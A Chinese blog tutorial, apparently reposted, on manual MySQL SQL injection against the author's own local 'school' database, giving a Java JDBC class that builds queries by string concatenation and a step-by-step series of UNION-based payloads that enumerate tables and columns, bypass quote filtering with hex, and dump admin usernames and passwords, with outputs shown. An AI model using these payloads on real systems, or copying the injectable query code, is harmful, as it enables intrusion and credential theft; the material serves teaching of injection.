mysql窗口界面表格式手工录入_mysql手工注入

作者：突击手丶罪域 | 来源：互联网 | 2023-05-18 15:45

以下是mynona本人原创的，奉献给大家，不要小看数据库注入参考：必备知识：mysql的sql注释符号：#无论

以下是mynona本人原创的&＃xff0c;奉献给大家&＃xff0c;不要小看数据库注入

参考&＃xff1a;

必备知识&＃xff1a;

mysql的sql注释符号&＃xff1a;#

无论mysql还是sqlServer数据库&＃xff0c;里面都有information_schema这个数据库&＃xff0c;这个数据库里面TABLES表保存了数据库所有表名&＃xff0c;COLUMNS表保存了表的所有字段名&＃xff0c;我们暴库就是针对这两个表。

SQL UNION 操作符

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。

请注意&＃xff0c;UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时&＃xff0c;每条 SELECT 语句中的列的顺序必须相同。

LIMIT子句

LIMIT 子句用于规定要返回的记录的数目。

对于拥有成千上万条记录的大型表来说&＃xff0c;LIMIT 子句是非常有用的。

语法&＃xff1a;SELECT 列名称 FROM 表名称 LIMIT 开始位置, 行数

注意&＃xff1a;开始位置可以省略&＃xff0c;默认是0位置

测试代码&＃xff1a;

数据库连接类

(适合mysql和MSSQL&＃xff12;&＃xff10;&＃xff10;&＃xff18;)

importjava.sql.Connection;public classDateExecute {privateString user;privateString password;privateString type;privateString databaseName;publicDateExecute(String type, String user, String password, String databaseName){this.type &＃61;type;this.user &＃61;user;this.password &＃61;password;this.databaseName &＃61;databaseName;

}publicConnection getConnection()throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection con&＃61; null;if(type.equals("mysql")){

String driverName&＃61; "com.mysql.jdbc.Driver";

Driver d&＃61;(Driver) Class.forName(driverName).newInstance();

con&＃61; DriverManager.getConnection("jdbc:mysql://localhost:3306/"&＃43;databaseName,

user, password);

}else{

String driverName&＃61; "com.microsoft.sqlserver.jdbc.SQLServerDriver";

Driver d&＃61;(Driver) Class.forName(driverName).newInstance();

con&＃61; DriverManager.getConnection("jdbc:sqlserver://localhost:1433; DatabaseName&＃61;"&＃43;databaseName,

user, password);

}returncon;

}public List>getDateList(String sql)throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection conn&＃61;getConnection();

List> list &＃61; new ArrayList>();try{//stmt &＃61; conn.prepareStatement(sql);//ResultSet rs &＃61; stmt.executeQuery(sql);

Statement state &＃61;conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);

ResultSet rs&＃61;state.executeQuery(sql);

list&＃61;convertList(rs);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnlist;

}private List convertList(ResultSet rs) throwsSQLException {

List list&＃61; newArrayList();

ResultSetMetaData md&＃61;rs.getMetaData();int columnCount &＃61; md.getColumnCount(); //Map rowData;

while (rs.next()) { //rowData &＃61; new HashMap(columnCount);

Map rowData &＃61; new HashMap();for (int i &＃61; 1; i <&＃61; columnCount; i&＃43;&＃43;) {

rowData.put(md.getColumnName(i), rs.getObject(i));

}

list.add(rowData);

}returnlist;

}public int executeUpdate(String sql) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

Connection conn&＃61;getConnection();

Statement stmt;int success &＃61; 0;try{

stmt&＃61;conn.createStatement();

success&＃61;stmt.executeUpdate(sql);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnsuccess;

}

测试类&＃xff1a;

(我们就是在这个类里面构造注入的sql语句)

importjava.sql.SQLException;public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {//”root”为你mysql用户名&＃xff0c;“xxxxx”为密码&＃xff0c;“school”为数据库名

DateExecute de &＃61; new DateExecute("mysql", "root", "XXXXX","school");//DateExecute de &＃61; new DateExecute("mssql", "sa", "abca157992.","school");//MYSQL

String sqlM&＃61; "select * from user;";

String sqlInsertM&＃61; "insert into user value(24,&＃39;mynona&＃39;,&＃39;122334&＃39;)";

String sqlDeleteM&＃61; "delete from user where name &＃61; &＃39;mynona&＃39;";

System.out.println(de.getDateList(sqlbefore&＃43;sql));//MSSQL/*String sqlbefore &＃61; "select * from student where id &＃61; 1 ";

String sql &＃61; " and 1&＃61;2 union select 1,column_name,3 from information_schema.columns where table_name&＃61;&＃39;student&＃39;";

String sqlInsert &＃61; "insert into student values(6, 222, 111)";

String sqlDelete &＃61; "delete from student where id &＃61; 4";*/

//de.executeUpdate(sqlInsert);

}

测试数据库&＃xff1a;

测试数据&＃xff1a;

假设我们的目标是admin这个表&＃xff0c;对于user这个表有个注入点:

Select * from user where name &＃61; ‘’;

具体如下&＃xff1a;

public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

DateExecute de&＃61; new DateExecute("mysql", "root", "157992","school");

String name&＃61; "admin";

String password&＃61;"mynona";

String sql&＃61; "select * from user where name &＃61; &＃39;" &＃43; name &＃43;"&＃39; and password &＃61; &＃39;" &＃43; password &＃43; "&＃39;";

System.out.println("执行的sql语句:\n" &＃43;sql);

System.out.println(de.getDateList(sql));

}

上面那条sql语句明显两个sql注入点&＃xff0c;分别是name和password

运行上面的程序&＃xff0c;可以正常输出&＃xff1a;

[{id&＃61;1, name&＃61;admin, password&＃61;mynona}]

现在我们要针对name这个注入点构造注入的sql语句。

判断注入点&＃xff1a;

目标&＃xff1a;看看是否有注入

我们令

name &＃61;"mynona and 1&＃61;1 #";

然后指向上面的测试代码&＃xff1a;

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;1 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;2, name&＃61;mynona, password&＃61;122334}]

还是之前的数据&＃xff0c;没变化

再令&＃xff1a;

name &＃61;"mynona and 1&＃61;2 #";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;2 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[]

没有数据了&＃xff0c;说明有注入

(tip:sql语句中“#”后面的内容会被忽略)

判断字段数(重要)&＃xff1a;

目标&＃xff1a;看看当前注入点select了几个字段

(知道这些字段数后以后我们做union语句时就等与这相等)

分别构造&＃xff1a;

name &＃61;"mynona&＃39; order by 1 #"; 输出正常

name&＃61;"mynona&＃39; order by 2 #";输出正常

name&＃61;"mynona&＃39; order by 3 #";输出正常

name&＃61;"mynona&＃39; order by 4 #";错误输出

由此可以知道当前的表有3个字段

然后我们联合查询&＃xff1a;

name &＃61;"mynona&＃39; and 1&＃61;2 union select 1,2,3 #";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;2 union select 1,2,3 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;1, name&＃61;2, password&＃61;3}]

查看用户名&＃xff1a;

name &＃61;"mynona&＃39; and 1&＃61;2 union select 1,user(),3 #";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;2 union select 1,user(),3 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;1, name&＃61;root&＃64;localhost, password&＃61;3}]

现在用户名出来了&＃xff0c;是root

查看数据库&＃xff1a;

name &＃61;"mynona&＃39; and 1&＃61;2 union select 1,database(),3 #";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;2 union select 1,database(),3 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;1, name&＃61;school, password&＃61;3}]

当前数据库名也出来了&＃xff1a;school

查看数据库版本&＃xff1a;

name &＃61;"mynona&＃39; and 1&＃61;2 union select 1,version(),3 #";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; and 1&＃61;2 union select 1,version(),3 #&＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;1, name&＃61;5.5.34, password&＃61;3}]

可以看到mysql版本是5.5.34

开始爆库&＃xff1a;

在mysql里有information_schema这个库&＃xff0c;这个库里有tables表&＃xff0c;表中有table_schema字段&＃xff0c;这个字段储存的时mysql里所有的库名&＃xff0c;同时还有table_name这个字段&＃xff0c;储存的是MySQL里所有的表名。

遍历数据库school里面的所有表&＃xff1a;

其实就是差information_schema数据库里面的TABLES表

name &＃61;"mynona&＃39; union select TABLE_NAME,2,3 from information_schema.tables where table_schema&＃61;&＃39;school&＃39;# ";

提示&＃xff1a;如果对方网站过滤了单引号的话&＃xff0c;可以把字符转为16进制&＃xff1a;

如school 的十六进制为&＃xff1a;0x7363686F6F6C

那么上面那条语句可以变为&＃xff1a;

name &＃61;"mynona&＃39; union select TABLE_NAME,2,3 from information_schema.tables where table_schema&＃61;0x7363686F6F6C# ";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; union select TABLE_NAME,2,3 from information_schema.tables where table_schema&＃61;0x7363686F6F6C# &＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;2, name&＃61;mynona, password&＃61;122334}, {id&＃61;admin, name&＃61;2, password&＃61;3}, {id&＃61;user, name&＃61;2, password&＃61;3}]

可以看到school数据库的表为user, admin

看到这里&＃xff0c;应该高兴&＃xff0c;因为admin说不定就存储这管理员的用户名和密码

下面我们遍历admin表(其实就跟上面遍历user表差不多)

其实就是查询数据库information_schema表里面的COLUMNS表

name &＃61;"mynona&＃39; union select 1,2,COLUMN_NAME from information_schema.&＃96;COLUMNS&＃96; where TABLE_NAME &＃61; &＃39;admin&＃39;# ";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; union select 1,2,COLUMN_NAME from information_schema.&＃96;COLUMNS&＃96; where TABLE_NAME &＃61; &＃39;admin&＃39;# &＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;2, name&＃61;mynona, password&＃61;122334}, {id&＃61;1, name&＃61;2, password&＃61;id}, {id&＃61;1, name&＃61;2, password&＃61;name}, {id&＃61;1, name&＃61;2, password&＃61;phone}, {id&＃61;1, name&＃61;2, password&＃61;sex}, {id&＃61;1, name&＃61;2, password&＃61;tel}, {id&＃61;1, name&＃61;2, password&＃61;password}]

可以看到遍历出了表admin的字段为&＃xff1a;id,name,phone,sex,tel,password

遍历name和password字段的数据&＃xff1a;

name &＃61;"mynona&＃39; union select 1,concat(name),concat(password) from admin # ";

执行的sql语句:

select * from user where name &＃61; &＃39;mynona&＃39; union select 1,concat(name),concat(password) from admin # &＃39; and password &＃61; &＃39;mynona&＃39;

输出结果&＃xff1a;

[{id&＃61;2, name&＃61;mynona, password&＃61;122334}, {id&＃61;1, name&＃61;admin, password&＃61;mynona}]

得出&＃xff1a;name&＃61;admin,password&＃61; mynona

就这样admin表遍历出来了

推荐阅读

int
关于cuowu类的错误提示和使用AdjustmentListener的问题

本文讨论了一个关于cuowu类的问题，作者在使用cuowu类时遇到了错误提示和使用AdjustmentListener的问题。文章提供了16个解决方案，并给出了两个可能导致错误的原因。 ... [详细]

蜡笔小新 2023-12-13 22:09:56
string
Netty拆包粘包问题解决 —— 特殊结束符

本文介绍了解决Netty拆包粘包问题的一种方法——使用特殊结束符。在通讯过程中，客户端和服务器协商定义一个特殊的分隔符号，只要没有发送分隔符号，就代表一条数据没有结束。文章还提供了服务端的示例代码。 ... [详细]

蜡笔小新 2023-12-14 18:02:45
int
Java实现大数乘法（分治算法）

本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]

蜡笔小新 2023-12-14 15:43:50
int
Java猜拳小游戏代码

本文介绍了一个Java猜拳小游戏的代码，通过使用Scanner类获取用户输入的拳的数字，并随机生成计算机的拳，然后判断胜负。该游戏可以选择剪刀、石头、布三种拳，通过比较两者的拳来决定胜负。 ... [详细]

蜡笔小新 2023-12-14 15:39:08
int
Java容器中的compareto方法排序原理解析

本文从源码解析Java容器中的compareto方法的排序原理，讲解了在使用数组存储数据时的限制以及存储效率的问题。同时提到了Redis的五大数据结构和list、set等知识点，回忆了作者大学时代的Java学习经历。文章以作者做的思维导图作为目录，展示了整个讲解过程。 ... [详细]

蜡笔小新 2023-12-14 13:53:31
int
求解hdu 1003 java题目的动态规划优化方法

本文讨论了如何优化解决hdu 1003 java题目的动态规划方法，通过分析加法规则和最大和的性质，提出了一种优化的思路。具体方法是，当从1加到n为负时，即sum(1,n)sum(n,s)，可以继续加法计算。同时，还考虑了两种特殊情况：都是负数的情况和有0的情况。最后，通过使用Scanner类来获取输入数据。 ... [详细]

蜡笔小新 2023-12-14 13:11:00
int
如何在有序字符序列中插入新字符并保持有序

本文介绍了如何在给定的有序字符序列中插入新字符，并保持序列的有序性。通过示例代码演示了插入过程，以及插入后的字符序列。 ... [详细]

蜡笔小新 2023-12-14 11:16:33
version
Spring特性实现接口多类的动态调用详解

本文详细介绍了如何使用Spring特性实现接口多类的动态调用。通过对Spring IoC容器的基础类BeanFactory和ApplicationContext的介绍，以及getBeansOfType方法的应用，解决了在实际工作中遇到的接口及多个实现类的问题。同时，文章还提到了SPI使用的不便之处，并介绍了借助ApplicationContext实现需求的方法。阅读本文，你将了解到Spring特性的实现原理和实际应用方式。 ... [详细]

蜡笔小新 2023-12-14 03:24:19
int
java 模拟get post请求_Java后台模拟发送http的get和post请求，并测试

个人学习使用：谨慎参考1Client类importcom.thoughtworks.gauge.Step;importcom.thoughtworks.gauge.T ... [详细]

蜡笔小新 2023-12-13 14:20:23
int
开发笔记:加密&json&StringIO模块&BytesIO模块

篇首语：本文由编程笔记#小编为大家整理，主要介绍了加密&json&StringIO模块&BytesIO模块相关的知识，希望对你有一定的参考价值。一、加密加密 ... [详细]

蜡笔小新 2023-12-14 15:18:35
int
java中gt与gtgt与gtgtgt与lt之间的区别

本文介绍了在Java中gt、gtgt、gtgtgt和lt之间的区别。通过解释符号的含义和使用例子，帮助读者理解这些符号在二进制表示和移位操作中的作用。同时，文章还提到了负数的补码表示和移位操作的限制。 ... [详细]

蜡笔小新 2023-12-14 12:33:24
select
javascript – 概述在Firefox上无法正常工作

我试图提出一些自定义大纲,以达到一些Web可访问性建议.但我不能用Firefox制作.这就是它在Chrome上的外观：而那个图标实际上是一个锚点.在Firefox上,它只概述了整个 ... [详细]

蜡笔小新 2023-12-14 10:20:38
int
安卓select模态框样式改变_微软Office风格的多端（Web、安卓、iOS）组件库——Fabric UI...

介绍FabricUI是微软开源的一套Office风格的多端组件库，共有三套针对性的组件，分别适用于web、android以及iOS，Fab ... [详细]

蜡笔小新 2023-12-14 05:55:08
int
Java String与StringBuffer的区别及其应用场景

本文主要介绍了Java中String和StringBuffer的区别，String是不可变的，而StringBuffer是可变的。StringBuffer在进行字符串处理时不生成新的对象，内存使用上要优于String类。因此，在需要频繁对字符串进行修改的情况下，使用StringBuffer更加适合。同时，文章还介绍了String和StringBuffer的应用场景。 ... [详细]

蜡笔小新 2023-12-13 19:21:06
go
VB.NET在线急等问题解决方法，如何统计数据库字段下的数据并显示在文本框里？

本文介绍了一个在线急等问题解决方法，即如何统计数据库中某个字段下的所有数据，并将结果显示在文本框里。作者提到了自己是一个菜鸟，希望能够得到帮助。作者使用的是ACCESS数据库，并且给出了一个例子，希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句，得到的结果是650，但不知道如何得到560。希望能够得到解决方案。 ... [详细]

蜡笔小新 2023-12-13 15:15:30

突击手丶罪域

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章